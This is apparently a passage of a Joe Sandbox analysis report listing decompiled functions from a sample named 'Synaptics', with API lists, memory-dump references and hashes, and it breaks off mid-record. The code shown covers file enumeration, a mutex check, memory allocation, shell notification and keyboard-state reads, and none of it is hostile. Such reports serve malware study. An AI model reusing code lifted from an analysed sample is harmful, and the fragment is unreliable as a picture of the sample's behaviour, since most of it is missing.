                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409B6C Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00409B6C(WORD* __eax) {
				int _t6;
				WORD* _t10;

				_t10 = __eax;
				_t6 = FindNextFileA( *(__eax + 0x14), __eax + 0x18); // executed
				if(_t6 == 0) {
					return GetLastError();
				} else {
					return E00409AB8(_t10);
				}
			}





                                                                                                                                                                                          0x00409b6d
                                                                                                                                                                                          0x00409b77
                                                                                                                                                                                          0x00409b7e
                                                                                                                                                                                          0x00409b8f
                                                                                                                                                                                          0x00409b80
                                                                                                                                                                                          0x00409b88
                                                                                                                                                                                          0x00409b88

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?,?,0047614C,?,004761F4,?), ref: 00409B77
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0047614C,?,004761F4,?), ref: 00409B89
                                                                                                                                                                                            • Part of subcall function 00409AB8: FileTimeToLocalFileTime.KERNEL32(?), ref: 00409AE5
                                                                                                                                                                                            • Part of subcall function 00409AB8: FileTimeToDosDateTime.KERNEL32 ref: 00409AF4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileTime$DateErrorFindLastLocalNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2103556486-0
                                                                                                                                                                                          • Opcode ID: 56d7e7a648cf0da11fd84696b73b02b24197c58a4e3c26e867bebf2357675fe8
                                                                                                                                                                                          • Instruction ID: 3ffd322738bc3e6d8a1a454ad62afb9dcd57891a573725529f03bbabbe8ea297
                                                                                                                                                                                          • Opcode Fuzzy Hash: 56d7e7a648cf0da11fd84696b73b02b24197c58a4e3c26e867bebf2357675fe8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DC012A270010457CF04BEFA6CC1957229C1A482143800977BD00DA283EA3CEC5497A5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0047423C Relevance: 2.5, APIs: 2, Instructions: 42COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                                                                          			E0047423C(char __eax, void* __ebx, char __edx, void* __esi, void* __eflags) {
				char _v8;
				char _v9;
				void* _t13;
				intOrPtr _t25;
				void* _t27;
				void* _t30;

				_v9 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t30);
				_push(0x4742ac);
				_push( *[fs:eax]);
				 *[fs:eax] = _t30 + 0xfffffff8;
				_t13 = E00406F90(0, 0xffffffff, E00404E80(_v8)); // executed
				_t27 = _t13;
				if(GetLastError() != 0xb7) {
					if(_t27 != 0 && _v9 == 0) {
						CloseHandle(_t27);
					}
				}
				_pop(_t25);
				 *[fs:eax] = _t25;
				_push(E004742B3);
				return E004049C0( &_v8);
			}









                                                                                                                                                                                          0x00474244
                                                                                                                                                                                          0x00474247
                                                                                                                                                                                          0x0047424d
                                                                                                                                                                                          0x00474254
                                                                                                                                                                                          0x00474255
                                                                                                                                                                                          0x0047425a
                                                                                                                                                                                          0x0047425d
                                                                                                                                                                                          0x0047426f
                                                                                                                                                                                          0x00474274
                                                                                                                                                                                          0x00474280
                                                                                                                                                                                          0x00474288
                                                                                                                                                                                          0x00474291
                                                                                                                                                                                          0x00474291
                                                                                                                                                                                          0x00474288
                                                                                                                                                                                          0x00474298
                                                                                                                                                                                          0x0047429b
                                                                                                                                                                                          0x0047429e
                                                                                                                                                                                          0x004742ab

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406F90: CreateMutexA.KERNEL32(?,004742AD,004742AC,?,00474274,00000000,000000FF,00000000,00000000,004742AC), ref: 00406FA6
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,000000FF,00000000,00000000,004742AC,?,?,022B2354), ref: 00474276
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,00000000,004742AC,?,?,022B2354), ref: 00474291
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4294037311-0
                                                                                                                                                                                          • Opcode ID: 4850ba17561e1c873fe8bc4785270eb792532f539cb592cedfd17b3320193e67
                                                                                                                                                                                          • Instruction ID: 318a60ea147540a6397c20476c41d700bab3d71984a2db83ba3ffa28fcbaf965
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4850ba17561e1c873fe8bc4785270eb792532f539cb592cedfd17b3320193e67
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3BF0F970908204AEDB11EAE59903AAF77DC9B95364F1242BBF808B22D2DB7C5D10819E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004015B4 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004015B4(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00401468(0x49e5ec, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                                                                                                                                                          0x004015b7
                                                                                                                                                                                          0x004015c1
                                                                                                                                                                                          0x004015d0
                                                                                                                                                                                          0x004015c3
                                                                                                                                                                                          0x004015c3
                                                                                                                                                                                          0x004015c3
                                                                                                                                                                                          0x004015d6
                                                                                                                                                                                          0x004015e3
                                                                                                                                                                                          0x004015e8
                                                                                                                                                                                          0x004015ea
                                                                                                                                                                                          0x004015ee
                                                                                                                                                                                          0x004015f7
                                                                                                                                                                                          0x004015fe
                                                                                                                                                                                          0x0040160a
                                                                                                                                                                                          0x00401611
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401611
                                                                                                                                                                                          0x004015fe
                                                                                                                                                                                          0x00401616

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004018BD), ref: 004015E3
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004018BD), ref: 0040160A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2087232378-0
                                                                                                                                                                                          • Opcode ID: 2a41817055169d40e4a074e172450ac6ffec0b6756877547212fbd35809227c4
                                                                                                                                                                                          • Instruction ID: 653e09eb2cf8d2b73dae0cb6bd44d4e3f867a6d1f4cfde1ef7f913290877d0a1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a41817055169d40e4a074e172450ac6ffec0b6756877547212fbd35809227c4
                                                                                                                                                                                          • Instruction Fuzzy Hash: FEF02772F003202BEB3059AA4CC1B535AC49F857A4F194076FD08FF3E9D6B58C0142A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0045E750 Relevance: 1.7, APIs: 1, Instructions: 175COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E0045E750(intOrPtr __eax, void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t81;
				intOrPtr _t118;
				intOrPtr _t131;
				signed int _t134;
				intOrPtr _t141;
				void* _t151;
				void* _t152;
				signed int _t155;
				void* _t157;
				void* _t159;
				intOrPtr _t160;

				_t81 = __eax;
				_t157 = _t159;
				_t160 = _t159 + 0xfffffff8;
				_v8 = __eax;
				if( *0x49c080 == 0) {
					L48:
					return _t81;
				} else {
					_t81 = _v8;
					if( *((intOrPtr*)(_t81 + 0xd6)) != 0) {
						goto L48;
					} else {
						_t134 = 0;
						if( *((short*)(_v8 + 0x34)) != 0) {
							_t134 = 0x8000000;
						}
						if( *((short*)(_v8 + 0x3c)) != 0) {
							_t134 = _t134 | 0x00000800;
						}
						if( *((short*)(_v8 + 0x44)) != 0) {
							_t134 = _t134 | 0x00000002;
						}
						if( *((short*)(_v8 + 0x4c)) != 0) {
							_t134 = _t134 | 0x00000004;
						}
						if( *((short*)(_v8 + 0x54)) != 0) {
							_t134 = _t134 | 0x00000100;
						}
						if( *((short*)(_v8 + 0x5c)) != 0) {
							_t134 = _t134 | 0x00010000;
						}
						if( *((short*)(_v8 + 0x64)) != 0) {
							_t134 = _t134 | 0x00000080;
						}
						if( *((short*)(_v8 + 0x6c)) != 0) {
							_t134 = _t134 | 0x00040000;
						}
						if( *((short*)(_v8 + 0x74)) != 0) {
							_t134 = _t134 | 0x00000020;
						}
						if( *((short*)(_v8 + 0x7c)) != 0) {
							_t134 = _t134 | 0x00000040;
						}
						if( *((short*)(_v8 + 0x84)) != 0) {
							_t134 = _t134 | 0x00000008;
						}
						if( *((short*)(_v8 + 0x8c)) != 0) {
							_t134 = _t134 | 0x00000200;
						}
						if( *((short*)(_v8 + 0x94)) != 0) {
							_t134 = _t134 | 0x00000400;
						}
						if( *((short*)(_v8 + 0x9c)) != 0) {
							_t134 = _t134 | 0x00020000;
						}
						if( *((short*)(_v8 + 0xa4)) != 0) {
							_t134 = _t134 | 0x00000001;
						}
						if( *((short*)(_v8 + 0xac)) != 0) {
							_t134 = _t134 | 0x00000010;
						}
						if( *((short*)(_v8 + 0xb4)) != 0) {
							_t134 = _t134 | 0x00004000;
						}
						if( *((short*)(_v8 + 0xbc)) != 0) {
							_t134 = _t134 | 0x00001000;
						}
						if( *((short*)(_v8 + 0xc4)) != 0) {
							_t134 = _t134 | 0x00008000;
						}
						_t81 = _v8;
						if( *((short*)(_t81 + 0xcc)) != 0) {
							_t134 = _t134 | 0x00002000;
						}
						if(_t134 == 0) {
							goto L48;
						} else {
							_t81 =  *((intOrPtr*)(_v8 + 0xea));
							if( *((intOrPtr*)(_t81 + 8)) <= 0) {
								goto L48;
							} else {
								_v12 = E0040275C( *( *((intOrPtr*)(_v8 + 0xea)) + 8) << 3);
								_push(_t157);
								_push(0x45e9b4);
								_push( *[fs:eax]);
								 *[fs:eax] = _t160;
								_t151 =  *( *((intOrPtr*)(_v8 + 0xea)) + 8) - 1;
								if(_t151 >= 0) {
									_t152 = _t151 + 1;
									_t155 = 0;
									do {
										 *((intOrPtr*)(_v12 + _t155 * 8)) = E0045D3C8( *((intOrPtr*)(E0041AC6C( *((intOrPtr*)(_v8 + 0xea)), _t155) + 4)), _t155, 0);
										_t131 = E0041AC6C( *((intOrPtr*)(_v8 + 0xea)), _t155);
										asm("cmc");
										asm("sbb eax, eax");
										 *((intOrPtr*)(_v12 + 4 + _t155 * 8)) = _t131;
										_t155 = _t155 + 1;
										_t152 = _t152 - 1;
									} while (_t152 != 0);
								}
								_t118 =  *0x49c080( *((intOrPtr*)(_v8 + 0xda)), 3, _t134,  *((intOrPtr*)(_v8 + 0xd2)),  *( *((intOrPtr*)(_v8 + 0xea)) + 8), _v12); // executed
								 *((intOrPtr*)(_v8 + 0xd6)) = _t118;
								_pop(_t141);
								 *[fs:eax] = _t141;
								_push(0x45e9bb);
								return E0040277C(_v12);
							}
						}
					}
				}
			}
















                                                                                                                                                                                          0x0045e750
                                                                                                                                                                                          0x0045e751
                                                                                                                                                                                          0x0045e753
                                                                                                                                                                                          0x0045e759
                                                                                                                                                                                          0x0045e763
                                                                                                                                                                                          0x0045e9bb
                                                                                                                                                                                          0x0045e9c1
                                                                                                                                                                                          0x0045e769
                                                                                                                                                                                          0x0045e769
                                                                                                                                                                                          0x0045e773
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045e779
                                                                                                                                                                                          0x0045e779
                                                                                                                                                                                          0x0045e783
                                                                                                                                                                                          0x0045e785
                                                                                                                                                                                          0x0045e785
                                                                                                                                                                                          0x0045e793
                                                                                                                                                                                          0x0045e795
                                                                                                                                                                                          0x0045e795
                                                                                                                                                                                          0x0045e7a3
                                                                                                                                                                                          0x0045e7a5
                                                                                                                                                                                          0x0045e7a5
                                                                                                                                                                                          0x0045e7b0
                                                                                                                                                                                          0x0045e7b2
                                                                                                                                                                                          0x0045e7b2
                                                                                                                                                                                          0x0045e7bd
                                                                                                                                                                                          0x0045e7bf
                                                                                                                                                                                          0x0045e7bf
                                                                                                                                                                                          0x0045e7cd
                                                                                                                                                                                          0x0045e7cf
                                                                                                                                                                                          0x0045e7cf
                                                                                                                                                                                          0x0045e7dd
                                                                                                                                                                                          0x0045e7df
                                                                                                                                                                                          0x0045e7df
                                                                                                                                                                                          0x0045e7ed
                                                                                                                                                                                          0x0045e7ef
                                                                                                                                                                                          0x0045e7ef
                                                                                                                                                                                          0x0045e7fd
                                                                                                                                                                                          0x0045e7ff
                                                                                                                                                                                          0x0045e7ff
                                                                                                                                                                                          0x0045e80a
                                                                                                                                                                                          0x0045e80c
                                                                                                                                                                                          0x0045e80c
                                                                                                                                                                                          0x0045e81a
                                                                                                                                                                                          0x0045e81c
                                                                                                                                                                                          0x0045e81c
                                                                                                                                                                                          0x0045e82a
                                                                                                                                                                                          0x0045e82c
                                                                                                                                                                                          0x0045e82c
                                                                                                                                                                                          0x0045e83d
                                                                                                                                                                                          0x0045e83f
                                                                                                                                                                                          0x0045e83f
                                                                                                                                                                                          0x0045e850
                                                                                                                                                                                          0x0045e852
                                                                                                                                                                                          0x0045e852
                                                                                                                                                                                          0x0045e863
                                                                                                                                                                                          0x0045e865
                                                                                                                                                                                          0x0045e865
                                                                                                                                                                                          0x0045e873
                                                                                                                                                                                          0x0045e875
                                                                                                                                                                                          0x0045e875
                                                                                                                                                                                          0x0045e883
                                                                                                                                                                                          0x0045e885
                                                                                                                                                                                          0x0045e885
                                                                                                                                                                                          0x0045e896
                                                                                                                                                                                          0x0045e898
                                                                                                                                                                                          0x0045e898
                                                                                                                                                                                          0x0045e8a9
                                                                                                                                                                                          0x0045e8ab
                                                                                                                                                                                          0x0045e8ab
                                                                                                                                                                                          0x0045e8b1
                                                                                                                                                                                          0x0045e8bc
                                                                                                                                                                                          0x0045e8be
                                                                                                                                                                                          0x0045e8be
                                                                                                                                                                                          0x0045e8c6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045e8cc
                                                                                                                                                                                          0x0045e8cf
                                                                                                                                                                                          0x0045e8d9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045e8df
                                                                                                                                                                                          0x0045e8f3
                                                                                                                                                                                          0x0045e8f8
                                                                                                                                                                                          0x0045e8f9
                                                                                                                                                                                          0x0045e8fe
                                                                                                                                                                                          0x0045e901
                                                                                                                                                                                          0x0045e910
                                                                                                                                                                                          0x0045e913
                                                                                                                                                                                          0x0045e915
                                                                                                                                                                                          0x0045e916
                                                                                                                                                                                          0x0045e918
                                                                                                                                                                                          0x0045e933
                                                                                                                                                                                          0x0045e941
                                                                                                                                                                                          0x0045e94a
                                                                                                                                                                                          0x0045e94b
                                                                                                                                                                                          0x0045e950
                                                                                                                                                                                          0x0045e954
                                                                                                                                                                                          0x0045e955
                                                                                                                                                                                          0x0045e955
                                                                                                                                                                                          0x0045e918
                                                                                                                                                                                          0x0045e980
                                                                                                                                                                                          0x0045e989
                                                                                                                                                                                          0x0045e991
                                                                                                                                                                                          0x0045e994
                                                                                                                                                                                          0x0045e997
                                                                                                                                                                                          0x0045e9b3
                                                                                                                                                                                          0x0045e9b3
                                                                                                                                                                                          0x0045e8d9
                                                                                                                                                                                          0x0045e8c6
                                                                                                                                                                                          0x0045e773

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SHChangeNotifyRegister.SHELL32(?,00000003,00000000,?,00000000,00000000), ref: 0045E980
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ChangeNotifyRegister
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2496720357-0
                                                                                                                                                                                          • Opcode ID: f24e7b66ea0324b3ee4482eb3eb50e10ec0849d43da89b57ff4719544de0bf0d
                                                                                                                                                                                          • Instruction ID: f0d6c2aca2f313063b58c8eb8d36d93d0d95f6167d0470ee0e7879a3adb86f1a
                                                                                                                                                                                          • Opcode Fuzzy Hash: f24e7b66ea0324b3ee4482eb3eb50e10ec0849d43da89b57ff4719544de0bf0d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2371D134A00204DFE715DB99C188F9977F6EB04305F5580E5E904AB3E2D3B9AF88DB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0043C1FC Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0043C1FC(intOrPtr* __eax, signed int* __edx) {
				signed int _v12;
				short _v14;
				char _v16;
				signed int _v20;
				intOrPtr* _v24;
				char _v280;
				signed int _t39;
				signed int _t40;
				signed int _t46;
				intOrPtr* _t47;
				signed int _t50;
				signed int _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t67;
				signed int _t68;
				void* _t73;
				signed int* _t79;
				intOrPtr _t90;
				intOrPtr* _t96;

				_t79 = __edx;
				_t96 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
					L4:
					_t39 =  *_t79;
					if(_t39 < 0x100 || _t39 > 0x108) {
						_t40 =  *_t79;
						__eflags = _t40 - 0x200;
						if(_t40 < 0x200) {
							L30:
							__eflags = _t40 - 0xb00b;
							if(_t40 == 0xb00b) {
								E0043AB1C(_t96, _t79[1], _t40, _t79[2]);
							}
							L32:
							return  *((intOrPtr*)( *_t96 - 0x14))();
						}
						__eflags = _t40 - 0x20a;
						if(_t40 > 0x20a) {
							goto L30;
						}
						__eflags =  *(_t96 + 0x50) & 0x00000080;
						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
							L16:
							_t46 =  *_t79 - 0x200;
							__eflags = _t46;
							if(__eflags == 0) {
								L21:
								_t47 =  *0x49dbcc; // 0x49ebb8
								E0045B21C( *_t47, _t79, _t96, __eflags);
								goto L32;
							}
							_t50 = _t46 - 1;
							__eflags = _t50;
							if(_t50 == 0) {
								L22:
								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
								if(__eflags != 0) {
									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
									goto L32;
								}
								return E00403DE8(_t96, __eflags);
							}
							_t53 = _t50 - 1;
							__eflags = _t53;
							if(_t53 == 0) {
								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
								goto L32;
							}
							__eflags = _t53 == 1;
							if(_t53 == 1) {
								goto L22;
							}
							_t55 =  *0x49eb18; // 0x22b12f4
							__eflags =  *((char*)(_t55 + 0x20));
							if( *((char*)(_t55 + 0x20)) == 0) {
								goto L32;
							} else {
								_t56 =  *0x49eb18; // 0x22b12f4
								__eflags =  *(_t56 + 0x1c);
								if( *(_t56 + 0x1c) == 0) {
									goto L32;
								}
								_t90 =  *0x49eb18; // 0x22b12f4
								_t25 = _t90 + 0x1c; // 0x0
								__eflags =  *_t79 -  *_t25;
								if( *_t79 !=  *_t25) {
									goto L32;
								}
								GetKeyboardState( &_v280);
								_v20 =  *_t79;
								_v16 = E00451924( &_v280);
								_v14 = _t79[1];
								_v12 = _t79[2];
								return E00403DE8(_t96, __eflags);
							}
							goto L21;
						}
						_t67 = _t40 - 0x203;
						__eflags = _t67;
						if(_t67 == 0) {
							L15:
							 *_t79 =  *_t79 - 2;
							__eflags =  *_t79;
							goto L16;
						}
						_t68 = _t67 - 3;
						__eflags = _t68;
						if(_t68 == 0) {
							goto L15;
						}
						__eflags = _t68 != 3;
						if(_t68 != 3) {
							goto L16;
						}
						goto L15;
					}
					_v24 = E004519E0(_t96);
					if(_v24 == 0) {
						goto L32;
					}
					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
					if(_t73 == 0) {
						goto L32;
					}
				} else {
					_v24 = E004519E0(__eax);
					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
						goto L4;
					} else {
						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
						if(_t73 == 0) {
							goto L4;
						}
					}
				}
				return _t73;
			}























                                                                                                                                                                                          0x0043c208
                                                                                                                                                                                          0x0043c20a
                                                                                                                                                                                          0x0043c210
                                                                                                                                                                                          0x0043c248
                                                                                                                                                                                          0x0043c248
                                                                                                                                                                                          0x0043c24f
                                                                                                                                                                                          0x0043c288
                                                                                                                                                                                          0x0043c28a
                                                                                                                                                                                          0x0043c28f
                                                                                                                                                                                          0x0043c367
                                                                                                                                                                                          0x0043c367
                                                                                                                                                                                          0x0043c36c
                                                                                                                                                                                          0x0043c379
                                                                                                                                                                                          0x0043c379
                                                                                                                                                                                          0x0043c37e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c384
                                                                                                                                                                                          0x0043c295
                                                                                                                                                                                          0x0043c29a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c2a0
                                                                                                                                                                                          0x0043c2a4
                                                                                                                                                                                          0x0043c2ba
                                                                                                                                                                                          0x0043c2bc
                                                                                                                                                                                          0x0043c2bc
                                                                                                                                                                                          0x0043c2c1
                                                                                                                                                                                          0x0043c2ce
                                                                                                                                                                                          0x0043c2d0
                                                                                                                                                                                          0x0043c2d9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c2d9
                                                                                                                                                                                          0x0043c2c3
                                                                                                                                                                                          0x0043c2c3
                                                                                                                                                                                          0x0043c2c4
                                                                                                                                                                                          0x0043c2e3
                                                                                                                                                                                          0x0043c2e3
                                                                                                                                                                                          0x0043c2e7
                                                                                                                                                                                          0x0043c2f9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c2f9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c2ef
                                                                                                                                                                                          0x0043c2c6
                                                                                                                                                                                          0x0043c2c6
                                                                                                                                                                                          0x0043c2c7
                                                                                                                                                                                          0x0043c300
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c300
                                                                                                                                                                                          0x0043c2c9
                                                                                                                                                                                          0x0043c2ca
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c307
                                                                                                                                                                                          0x0043c30c
                                                                                                                                                                                          0x0043c310
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c312
                                                                                                                                                                                          0x0043c312
                                                                                                                                                                                          0x0043c317
                                                                                                                                                                                          0x0043c31b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c31f
                                                                                                                                                                                          0x0043c325
                                                                                                                                                                                          0x0043c325
                                                                                                                                                                                          0x0043c328
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c331
                                                                                                                                                                                          0x0043c338
                                                                                                                                                                                          0x0043c346
                                                                                                                                                                                          0x0043c34d
                                                                                                                                                                                          0x0043c354
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c360
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c310
                                                                                                                                                                                          0x0043c2a6
                                                                                                                                                                                          0x0043c2a6
                                                                                                                                                                                          0x0043c2ab
                                                                                                                                                                                          0x0043c2b7
                                                                                                                                                                                          0x0043c2b7
                                                                                                                                                                                          0x0043c2b7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c2b7
                                                                                                                                                                                          0x0043c2ad
                                                                                                                                                                                          0x0043c2ad
                                                                                                                                                                                          0x0043c2b0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c2b2
                                                                                                                                                                                          0x0043c2b5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c2b5
                                                                                                                                                                                          0x0043c25f
                                                                                                                                                                                          0x0043c266
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c275
                                                                                                                                                                                          0x0043c27d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c283
                                                                                                                                                                                          0x0043c212
                                                                                                                                                                                          0x0043c219
                                                                                                                                                                                          0x0043c220
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c22e
                                                                                                                                                                                          0x0043c23d
                                                                                                                                                                                          0x0043c242
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043c242
                                                                                                                                                                                          0x0043c220
                                                                                                                                                                                          0x0043c38d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0043C331
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: KeyboardState
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1724228437-0
                                                                                                                                                                                          • Opcode ID: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                                                                                                                                                          • Instruction ID: 91b3d7ef9cae681235685cdbb9a2033184f7e3317d8ce185dcb9f17e25b61164
